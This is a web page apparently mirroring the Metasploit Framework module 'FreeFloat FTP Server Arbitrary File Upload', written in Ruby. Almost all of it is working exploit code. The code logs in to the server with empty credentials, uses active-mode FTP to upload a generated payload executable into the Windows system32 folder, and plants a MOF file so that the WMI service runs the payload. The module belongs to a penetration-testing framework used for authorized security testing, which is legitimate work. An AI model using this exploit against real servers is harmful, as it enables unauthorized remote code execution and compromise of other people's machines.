CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutSign UpSign In
rapid7

Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/windows/ftp/freefloatftp_wbem.rb
Views: 11784
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Remote

7
  Rank = ExcellentRanking

8


9
  include Msf::Exploit::Remote::Ftp

10
  include Msf::Exploit::Remote::TcpServer

11
  include Msf::Exploit::EXE

12
  include Msf::Exploit::WbemExec

13
  include Msf::Exploit::FileDropper

14


15
  def initialize(info={})

16
    super(update_info(info,

17
      'Name'           => "FreeFloat FTP Server Arbitrary File Upload",

18
      'Description'    => %q{

19
          This module abuses multiple issues in FreeFloat: 1. No credential is actually

20
        needed to login; 2. User's default path is in C:\, and this cannot be changed;

21
        3. User can write to anywhere on the server's file system.  As a result of these

22
        poor implementations, a malicious user can just log in and then upload files,

23
        and let WMI (Management Instrumentation service) to execute the payload uploaded.

24
      },

25
      'License'        => MSF_LICENSE,

26
      'Author'         =>

27
        [

28
          'sinn3r', # Vulnerability discovery, Metasploit module

29
          'juan vazquez' # Metasploit module

30
        ],

31
      'References'     =>

32
        [

33
          ['OSVDB', '88302'],

34
          ['OSVDB', '88303']

35
        ],

36
      'Platform'       => 'win',

37
      'Targets'        =>

38
        [

39
          ['FreeFloat', {}]

40
        ],

41
      'Privileged'     => true,

42
      'DisclosureDate' => '2012-12-07',

43
      'DefaultTarget'  => 0))

44


45
    register_options(

46
      [

47
        # Change the default description so this option makes sense

48
        OptPort.new('SRVPORT', [true, 'The local port to listen on for active mode', 8080])

49
      ])

50


51
    deregister_options('FTPUSER', 'FTPPASS') # Using empty user and password

52
  end

53


54


55
  def check

56
    connect

57
    disconnect

58


59
    if banner =~ /FreeFloat/

60
      return Exploit::CheckCode::Detected

61
    else

62
      return Exploit::CheckCode::Safe

63
    end

64
  end

65


66


67
  def on_client_connect(cli)

68
    peer = "#{cli.peerhost}:#{cli.peerport}"

69


70
    case @stage

71
    when :exe

72
      print_status("Sending executable (#{@exe.length.to_s} bytes)")

73
      cli.put(@exe)

74
      @stage = :mof

75


76
    when :mof

77
      print_status("Sending MOF (#{@mof.length.to_s} bytes)")

78
      cli.put(@mof)

79
    end

80


81
    cli.close

82
  end

83


84


85
  def upload(filename)

86
    select(nil, nil, nil, 1)

87


88
    peer = "#{rhost}:#{rport}"

89
    print_status("Trying to upload #{::File.basename(filename)}")

90


91
    conn = connect(false, datastore['VERBOSE'])

92


93
    print_status("Sending empty login...")

94


95
    res = send_user("", conn)

96
    if not res or res !~ /331/

97
      print_error("Error sending username")

98
      return false

99
    end

100


101
    res = send_pass("", conn)

102
    if not res or res !~ /230/

103
      print_error("Error sending password")

104
      return false

105
    end

106


107
    print_good("Empty authentication was successful")

108


109
    # Switch to binary mode

110
    print_status("Set binary mode")

111
    send_cmd(['TYPE', 'I'], true, conn)

112


113
    # Prepare active mode: Get attacker's IP and source port

114
    src_ip   = datastore['SRVHOST'] == '0.0.0.0' ? Rex::Socket.source_address : datastore['SRVHOST']

115
    src_port = datastore['SRVPORT'].to_i

116


117
    # Prepare active mode: Convert the IP and port for active mode

118
    src_ip   = src_ip.gsub(/\./, ',')

119
    src_port = "#{src_port/256},#{src_port.remainder(256)}"

120


121
    # Set to active mode

122
    print_status("Set active mode \"#{src_ip},#{src_port}\"")

123
    send_cmd(['PORT', "#{src_ip},#{src_port}"], true, conn)

124


125
    # Tell the FTP server to download our file

126
    send_cmd(['STOR', filename], false, conn)

127


128
    disconnect(conn)

129
  end

130


131


132
  def exploit

133


134
    exe_name = "WINDOWS/system32/#{rand_text_alpha(rand(10)+5)}.exe"

135
    mof_name = "WINDOWS/system32/wbem/mof/#{rand_text_alpha(rand(10)+5)}.mof"

136
    @mof      = generate_mof(::File.basename(mof_name), ::File.basename(exe_name))

137
    @exe      = generate_payload_exe

138
    @stage = :exe

139


140
    begin

141
      t = framework.threads.spawn("reqs", false) {

142
        begin

143
          # Upload our malicious executable

144
          u = upload(exe_name)

145
          # Upload the mof file

146
          upload(mof_name) if u

147
          register_file_for_cleanup("#{::File.basename(exe_name)}")

148
          register_file_for_cleanup("wbem\\mof\\good\\#{::File.basename(mof_name)}")

149
        rescue ::Exception => e

150
          print_error "Upload Failed: #{e.message}"

151
          cleanup

152
        end

153
      }

154
      super

155
    ensure

156
      t.kill

157
    end

158
  end

159
end

160


161